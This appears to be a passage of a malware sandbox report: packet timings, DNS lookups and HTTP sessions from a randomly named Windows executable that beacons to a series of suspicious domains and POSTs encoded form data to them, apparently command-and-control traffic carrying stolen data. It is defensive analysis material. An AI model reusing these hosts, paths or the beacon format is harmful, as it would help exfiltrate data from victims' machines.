                                                        Dec 11, 2024 04:52:02.943146944 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.943253994 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:02.943283081 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:04.121299028 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:04.122040033 CET8049948172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:04.122102022 CET4994880192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:04.327805042 CET4994880192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:05.344835043 CET4995480192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:05.464221001 CET8049954172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:05.464313030 CET4995480192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:05.473501921 CET4995480192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:05.593137980 CET8049954172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:06.803153992 CET8049954172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:06.804096937 CET8049954172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:06.804179907 CET4995480192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:06.806138039 CET4995480192.168.2.4172.67.182.198
                                                        Dec 11, 2024 04:52:06.926538944 CET8049954172.67.182.198192.168.2.4
                                                        Dec 11, 2024 04:52:12.566675901 CET4997580192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:12.685909033 CET8049975209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:12.686016083 CET4997580192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:12.701015949 CET4997580192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:12.820301056 CET8049975209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:13.920367002 CET8049975209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:13.920598984 CET8049975209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:13.920650005 CET4997580192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:14.216487885 CET4997580192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:15.235264063 CET4998180192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:15.354604006 CET8049981209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:15.354712009 CET4998180192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:15.370254040 CET4998180192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:15.489778996 CET8049981209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:16.584924936 CET8049981209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:16.585063934 CET8049981209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:16.585114956 CET4998180192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:16.872575045 CET4998180192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:17.891499043 CET4998780192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:18.010811090 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.011008978 CET4998780192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:18.026133060 CET4998780192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:18.145515919 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145580053 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145642996 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145703077 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145746946 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145755053 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145859003 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145867109 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:18.145876884 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:19.304116964 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:19.304214954 CET8049987209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:19.304264069 CET4998780192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:19.528819084 CET4998780192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:20.547718048 CET4999380192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:20.668046951 CET8049993209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:20.668129921 CET4999380192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:20.678031921 CET4999380192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:20.797313929 CET8049993209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:21.917340994 CET8049993209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:21.917355061 CET8049993209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:21.917490005 CET4999380192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:21.920087099 CET4999380192.168.2.4209.74.79.40
                                                        Dec 11, 2024 04:52:22.039293051 CET8049993209.74.79.40192.168.2.4
                                                        Dec 11, 2024 04:52:27.634923935 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:27.754169941 CET805001413.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:27.754273891 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:27.769006014 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:27.888401031 CET805001413.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:29.278826952 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:29.341694117 CET805001413.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:29.341747999 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:29.341872931 CET805001413.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:29.341918945 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:29.398046017 CET805001413.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:29.398118973 CET5001480192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:30.297692060 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:30.417360067 CET805002013.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:30.417434931 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:30.431706905 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:30.551366091 CET805002013.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:31.935158968 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:32.004187107 CET805002013.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:32.004240990 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:32.004317045 CET805002013.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:32.004363060 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:32.055771112 CET805002013.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:32.055844069 CET5002080192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:32.959971905 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:33.079354048 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.079431057 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:33.095495939 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:33.214936972 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.214972973 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.214984894 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215066910 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215075016 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215157032 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215167046 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215285063 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:33.215297937 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:34.606925964 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:34.676851988 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:34.676932096 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:34.726712942 CET805002613.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:34.726797104 CET5002680192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:35.625827074 CET5003180192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:35.745182037 CET805003113.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:35.745270967 CET5003180192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:35.753976107 CET5003180192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:35.873214006 CET805003113.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:37.334223032 CET805003113.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:37.334254026 CET805003113.228.81.39192.168.2.4
                                                        Dec 11, 2024 04:52:37.334498882 CET5003180192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:37.337327003 CET5003180192.168.2.413.228.81.39
                                                        Dec 11, 2024 04:52:37.456666946 CET805003113.228.81.39192.168.2.4
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 11, 2024 04:50:39.559731960 CET6083653192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:50:40.407747984 CET53608361.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:50:55.158163071 CET6340653192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:50:56.153743982 CET6340653192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:50:56.747701883 CET53634061.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:50:56.747736931 CET53634061.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:51:11.563601971 CET6172853192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:51:12.333903074 CET53617281.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:51:26.735516071 CET5740553192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:51:27.057224989 CET53574051.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:51:41.750368118 CET5329253192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:51:42.354305029 CET53532921.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:51:56.970279932 CET6025053192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:51:57.366693020 CET53602501.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:52:11.813760042 CET6209353192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:52:12.564165115 CET53620931.1.1.1192.168.2.4
                                                        Dec 11, 2024 04:52:26.938442945 CET5000953192.168.2.41.1.1.1
                                                        Dec 11, 2024 04:52:27.632389069 CET53500091.1.1.1192.168.2.4
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Dec 11, 2024 04:50:39.559731960 CET192.168.2.41.1.1.10x7dccStandard query (0)www.wuyyv4tq.topA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:50:55.158163071 CET192.168.2.41.1.1.10xfe94Standard query (0)www.313333.xyzA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:50:56.153743982 CET192.168.2.41.1.1.10xfe94Standard query (0)www.313333.xyzA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:11.563601971 CET192.168.2.41.1.1.10xd4f0Standard query (0)www.mosquitoxp.lolA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:26.735516071 CET192.168.2.41.1.1.10x565eStandard query (0)www.mzkd6gp5.topA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:41.750368118 CET192.168.2.41.1.1.10x6d8aStandard query (0)www.epayassist.netA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:56.970279932 CET192.168.2.41.1.1.10x80a1Standard query (0)www.grimbo.boatsA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:11.813760042 CET192.168.2.41.1.1.10xcc07Standard query (0)www.balanpoint.lifeA (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:26.938442945 CET192.168.2.41.1.1.10x44c4Standard query (0)www.erexolsk.shopA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 11, 2024 04:50:40.407747984 CET1.1.1.1192.168.2.40x7dccNo error (0)www.wuyyv4tq.top156.226.63.13A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:50:56.747701883 CET1.1.1.1192.168.2.40xfe94No error (0)www.313333.xyz103.120.80.111A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:50:56.747736931 CET1.1.1.1192.168.2.40xfe94No error (0)www.313333.xyz103.120.80.111A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:12.333903074 CET1.1.1.1192.168.2.40xd4f0No error (0)www.mosquitoxp.lol38.180.232.109A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:27.057224989 CET1.1.1.1192.168.2.40x565eNo error (0)www.mzkd6gp5.top172.67.158.81A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:27.057224989 CET1.1.1.1192.168.2.40x565eNo error (0)www.mzkd6gp5.top104.21.65.44A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:42.354305029 CET1.1.1.1192.168.2.40x6d8aNo error (0)www.epayassist.net208.91.197.27A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:57.366693020 CET1.1.1.1192.168.2.40x80a1No error (0)www.grimbo.boats172.67.182.198A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:51:57.366693020 CET1.1.1.1192.168.2.40x80a1No error (0)www.grimbo.boats104.21.18.171A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:12.564165115 CET1.1.1.1192.168.2.40xcc07No error (0)www.balanpoint.life209.74.79.40A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:27.632389069 CET1.1.1.1192.168.2.40x44c4No error (0)www.erexolsk.shopdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                                                        Dec 11, 2024 04:52:27.632389069 CET1.1.1.1192.168.2.40x44c4No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:27.632389069 CET1.1.1.1192.168.2.40x44c4No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                                                        Dec 11, 2024 04:52:27.632389069 CET1.1.1.1192.168.2.40x44c4No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                                                        • www.wuyyv4tq.top
                                                        • www.313333.xyz
                                                        • www.mosquitoxp.lol
                                                        • www.mzkd6gp5.top
                                                        • www.epayassist.net
                                                        • www.grimbo.boats
                                                        • www.balanpoint.life
                                                        • www.erexolsk.shop
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.449743156.226.63.13805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:50:40.606653929 CET538OUTGET /0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.wuyyv4tq.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:50:45.119699001 CET691INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 11 Dec 2024 03:50:44 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 548
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449779103.120.80.111805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:50:56.996035099 CET797OUTPOST /5jna/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.313333.xyz
                                                        Origin: http://www.313333.xyz
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.313333.xyz/5jna/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 67 4f 53 49 6c 75 68 39 54 4c 6d 59 49 4d 30 51 4f 54 6f 77 64 70 56 56 62 52 57 76 6c 33 6b 68 44 52 52 59 73 43 52 57 70 65 61 69 50 4c 61 76 78 47 61 38 4b 58 49 42 35 43 4a 69 37 44 43 6c 57 41 4e 68 35 35 62 67 74 4b 65 33 54 6f 48 77 44 57 56 66 32 79 78 44 46 79 46 49 34 61 58 56 52 73 4f 66 58 49 46 4f 4e 46 6b 4f 39 36 44 74 74 7a 76 70 36 59 70 59 6c 48 64 6c 59 61 52 44 74 63 6d 4a 42 70 74 76 6a 50 67 42 6a 68 37 76 63 55 58 4d 6a 6f 34 69 64 6c 63 6c 32 55 6a 61 6c 56 71 76 54 41 33 30 72 2f 37 7a 33 44 4b 64 65 6a 6a 58 70 67 3d 3d
                                                        Data Ascii: gnlxDxt=l+uQF2GaIYZVgOSIluh9TLmYIM0QOTowdpVVbRWvl3khDRRYsCRWpeaiPLavxGa8KXIB5CJi7DClWANh55bgtKe3ToHwDWVf2yxDFyFI4aXVRsOfXIFONFkO96Dttzvp6YpYlHdlYaRDtcmJBptvjPgBjh7vcUXMjo4idlcl2UjalVqvTA30r/7z3DKdejjXpg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449785103.120.80.111805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:50:59.656758070 CET817OUTPOST /5jna/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.313333.xyz
                                                        Origin: http://www.313333.xyz
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.313333.xyz/5jna/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 41 68 44 78 68 59 74 47 39 57 71 65 61 69 46 72 61 71 2b 6d 61 72 4b 58 46 30 35 48 68 69 37 44 47 6c 57 41 64 68 34 49 62 6a 74 61 65 35 61 49 48 79 4d 32 56 66 32 79 78 44 46 79 35 6d 34 63 2f 56 52 63 2b 66 55 71 68 52 45 6c 6b 4e 72 71 44 74 37 7a 76 74 36 59 70 32 6c 43 30 43 59 59 35 44 74 5a 61 4a 42 59 74 6f 74 2f 67 59 73 42 36 49 63 6b 2b 46 6a 4c 64 7a 62 48 38 58 2f 51 58 69 74 7a 6e 31 43 78 57 6a 35 2f 66 41 71 45 44 70 54 67 65 65 79 75 44 63 58 7a 66 72 4b 64 4a 61 64 54 6e 59 52 49 7a 57 35 38 45 3d
                                                        Data Ascii: gnlxDxt=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFAhDxhYtG9WqeaiFraq+marKXF05Hhi7DGlWAdh4Ibjtae5aIHyM2Vf2yxDFy5m4c/VRc+fUqhRElkNrqDt7zvt6Yp2lC0CYY5DtZaJBYtot/gYsB6Ick+FjLdzbH8X/QXitzn1CxWj5/fAqEDpTgeeyuDcXzfrKdJadTnYRIzW58E=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449792103.120.80.111805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:02.324479103 CET10899OUTPOST /5jna/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.313333.xyz
                                                        Origin: http://www.313333.xyz
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.313333.xyz/5jna/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 6c 2b 75 51 46 32 47 61 49 59 5a 56 68 75 43 49 6e 4f 64 39 44 62 6d 62 48 73 30 51 42 7a 6f 30 64 75 64 56 62 54 36 5a 6d 46 49 68 43 43 70 59 73 6e 39 57 72 65 61 69 47 72 61 72 2b 6d 62 70 4b 58 64 77 35 48 6c 59 37 41 75 6c 58 6a 6c 68 78 64 37 6a 69 61 65 35 59 49 48 2f 44 57 56 47 32 32 64 48 46 7a 56 6d 34 63 2f 56 52 65 57 66 41 6f 46 52 49 46 6b 4f 39 36 44 68 74 7a 76 46 36 59 77 4c 6c 43 77 34 59 6f 5a 44 74 39 47 4a 61 4f 52 6f 72 76 67 4e 6c 52 36 51 63 6b 69 47 6a 4c 42 2f 62 44 31 4b 2f 58 2f 69 76 43 58 6a 52 43 37 31 6c 64 37 6a 36 56 72 36 65 79 57 37 70 39 58 4a 51 52 66 69 56 66 49 32 5a 30 44 55 54 39 36 58 72 62 71 65 48 52 55 45 6b 65 65 49 4c 52 31 77 41 32 42 53 52 38 6f 63 55 58 78 54 6a 52 72 2b 6c 76 5a 6d 53 73 55 4b 69 6a 4a 45 46 71 61 47 4d 63 42 6f 6d 59 30 43 79 77 71 39 62 65 30 4d 63 4a 6c 4b 6b 70 4a 4e 38 2b 56 4e 79 43 4e 43 6d 6e 43 52 65 4d 67 46 72 41 4b 61 78 38 6e 49 6e 32 7a 6d 65 72 4a 54 6f 6a 45 30 64 69 70 66 44 30 4c 77 43 31 [TRUNCATED]
                                                        Data Ascii: gnlxDxt=l+uQF2GaIYZVhuCInOd9DbmbHs0QBzo0dudVbT6ZmFIhCCpYsn9WreaiGrar+mbpKXdw5HlY7AulXjlhxd7jiae5YIH/DWVG22dHFzVm4c/VReWfAoFRIFkO96DhtzvF6YwLlCw4YoZDt9GJaORorvgNlR6QckiGjLB/bD1K/X/ivCXjRC71ld7j6Vr6eyW7p9XJQRfiVfI2Z0DUT96XrbqeHRUEkeeILR1wA2BSR8ocUXxTjRr+lvZmSsUKijJEFqaGMcBomY0Cywq9be0McJlKkpJN8+VNyCNCmnCReMgFrAKax8nIn2zmerJTojE0dipfD0LwC1LkFmonAvwYF394bntXZwxHC2eyeGm0mmUcOhpPF9+VYh56k86C7qv39VgEU9+Deir3D22szOVf5AzB2rzjsqa0HS0hUWXNPmeueRLhEUNqvpsfiyytgv16cj8vNcGIEpYxF+cSHXC1IY0yEvaw44+HB5ZMiJ4nry8MgT7tAOLmYfZ6qo2zZ2XFvhcuYAO7GxNo6rHGvl3abEXj2ZDmTjMyqBCkbqZ5OL2iUM0gJddJD81dEvntMHVWRMi4gATZ/BjLZwE8BQywjBr5ZeUIUDil9OMkD+UZM2YAjCnQZdcGZIb7rMWTzrnmyslnyz5vCfEXiBqxVd8YL0JhH5jN4sS7hHQuThugUxWD7uV4DWnnTORF8NkL3jGAm9Q2eCVK9NzZA7MKp86cw4nWGxrfWiZWjnHu3WSaZ2H+PCd1uANCKw7SjYW6kGC0PB0GeZvQjvspVQRRDyBb2Ma7geZlh/2icE37qYtdMwT1H1QuBeQlJpJ63s9A8kc/ScP/hdE1HxltfJkb59Bsg7A9CJWBafcS7exWGRWhNE/rmJFIley3It/9GJYSq0sraC03WTphnLfXi80a8mKiFFwc5y78HxoiobEKjqVwdcVyDLeXJNcadB48VBkR8Oz7Iq3atNdqZ2wYG/cdkqxsJJGUFN7F8bZepCQlq2d0xdkp [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.449803103.120.80.111805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:04.993350029 CET536OUTGET /5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.313333.xyz
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
